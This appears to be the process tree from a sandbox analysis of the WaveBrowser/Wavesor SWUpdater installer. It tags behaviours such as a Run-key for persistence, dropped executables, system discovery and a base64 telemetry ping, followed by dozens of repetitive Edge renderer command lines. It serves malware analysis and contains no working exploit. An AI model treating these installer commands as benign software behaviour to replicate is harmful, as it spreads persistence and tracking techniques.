C:\Program Files (x86)\Wavesor\Temp\GUM509C.tmp\SWUpdater.exe"C:\Program Files (x86)\Wavesor\Temp\GUM509C.tmp\SWUpdater.exe" /install "bundlename=WaveBrowser&appguid={EB149AD2-CE4E-4F51-B7FC-A149FAA4CCAF}&appname=WaveBrowser&needsadmin=False&lang=en&usagestats=1&installdataindex=1"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5664 -
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /regserver5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4632 -
C:\Users\Admin\Wavesor Software\SWUpdater\1.3.135.0\SWUpdaterComRegisterShell64.exe"C:\Users\Admin\Wavesor Software\SWUpdater\1.3.135.0\SWUpdaterComRegisterShell64.exe" /user6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:2148
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\1.3.135.0\SWUpdaterComRegisterShell64.exe"C:\Users\Admin\Wavesor Software\SWUpdater\1.3.135.0\SWUpdaterComRegisterShell64.exe" /user6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:3980
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\1.3.135.0\SWUpdaterComRegisterShell64.exe"C:\Users\Admin\Wavesor Software\SWUpdater\1.3.135.0\SWUpdaterComRegisterShell64.exe" /user6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:3432
-
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJTV1VwZGF0ZXIiIHVwZGF0ZXJ2ZXJzaW9uPSIxLjMuMTM1LjAiIHNoZWxsX3ZlcnNpb249IjEuMy4xMzUuMCIgaXNtYWNoaW5lPSIwIiBzZXNzaW9uaWQ9IntBNTI2OTY3My05MDM3LTQ2QTYtQjg3Ni0wMzYwNjcwNDNCMTJ9IiB1c2VyaWQ9InszZmE1NjQ1Mi05ZmZmLTQ1YWUtODQzMS0wNjc3NTI4MWQwZWJ9IiBpbnN0YWxsc291cmNlPSJvdGhlcmluc3RhbGxjbWQiIHJlcXVlc3RpZD0iezQ2MTNCMTk2LTBDOTItNDBCOS1BMjI1LUY3NzYyMUE0QkUxQn0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7RjZGNjBBQ0UtNzFBRC00NjEwLTgwRDQtOTI1MzcyOUZCNEI3fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMS4zLjEzNS4wIiBsYW5nPSJlbiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iNjIzIi8-PC9hcHA-PC9yZXF1ZXN0Pg5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4324
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /handoff "bundlename=WaveBrowser&appguid={EB149AD2-CE4E-4F51-B7FC-A149FAA4CCAF}&appname=WaveBrowser&needsadmin=False&lang=en&usagestats=1&installdataindex=1" /installsource otherinstallcmd /sessionid "{A5269673-9037-46A6-B876-036067043B12}"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:5884
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:12⤵PID:3028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:12⤵PID:740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:12⤵PID:3144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1876 /prefetch:12⤵PID:3992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7960 /prefetch:12⤵PID:4328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8060 /prefetch:12⤵PID:5712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:12⤵PID:5316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7992 /prefetch:12⤵PID:6084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7336 /prefetch:12⤵PID:2468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:12⤵PID:4408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:12⤵PID:3616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:12⤵PID:6048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:12⤵PID:3228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:12⤵PID:3284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1816 /prefetch:12⤵PID:5992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:12⤵PID:5972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:12⤵PID:8332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:12⤵PID:8452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7064 /prefetch:22⤵PID:8724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8348 /prefetch:12⤵PID:8892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7544 /prefetch:12⤵PID:9108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:12⤵PID:7900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8820 /prefetch:12⤵PID:8888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:12⤵PID:860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8712 /prefetch:12⤵PID:7716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8648 /prefetch:12⤵PID:1656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8680 /prefetch:12⤵PID:1256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:12⤵PID:9168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9004 /prefetch:12⤵PID:7380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8704 /prefetch:12⤵PID:8056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8244 /prefetch:12⤵PID:7616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:12⤵PID:8240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9024 /prefetch:12⤵PID:8248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9036 /prefetch:12⤵PID:8252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9144 /prefetch:12⤵PID:7612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9764 /prefetch:12⤵PID:6536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9688 /prefetch:12⤵PID:4920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9524 /prefetch:12⤵PID:8800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:12⤵PID:8256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=9392 /prefetch:82⤵PID:8420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:12⤵PID:8284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:12⤵PID:7012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:12⤵PID:5348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:12⤵PID:1596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8604 /prefetch:12⤵PID:5756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:12⤵PID:5472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:12⤵PID:9052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:12⤵PID:1952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:12⤵PID:5996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10120 /prefetch:12⤵PID:8484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:12⤵PID:5680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10044 /prefetch:12⤵PID:4428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10160 /prefetch:12⤵PID:8628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10172 /prefetch:12⤵PID:3240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10164 /prefetch:12⤵PID:8640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1724 /prefetch:12⤵PID:2272
-
-
